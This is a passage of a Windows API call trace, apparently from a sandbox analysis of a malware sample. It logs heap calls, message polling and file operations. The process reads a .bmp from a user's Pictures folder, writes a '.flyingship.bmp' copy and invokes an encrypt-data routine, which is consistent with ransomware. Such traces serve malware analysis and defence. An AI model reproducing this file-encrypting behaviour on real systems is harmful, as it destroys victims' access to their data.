lpMsg=0x87f36c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\rcum7ulgy1kxh5mcjre6.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.686] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.686] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.690] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.690] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0190.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0190.695] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh")) returned 0x10 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\rcum7ulgy1kxh5mcjre6.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0190.698] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.698] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0190.698] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0190.699] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.699] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0190.752] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x720a, lpOverlapped=0x0) returned 1 [0190.752] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1720a) returned 0xbea018 [0190.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1720a) returned 0xa5f008 [0190.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.757] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0190.757] TranslateMessage (lpMsg=0x87f36c) returned 0 [0190.757] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0190.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.757] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0190.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.757] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0190.757] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0190.757] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1720a) returned 0xbea018 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.758] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.758] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1720a) returned 0xbea018 [0190.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0190.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1720a) returned 0xa76220 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0190.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.761] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.761] PeekMessageW (in: 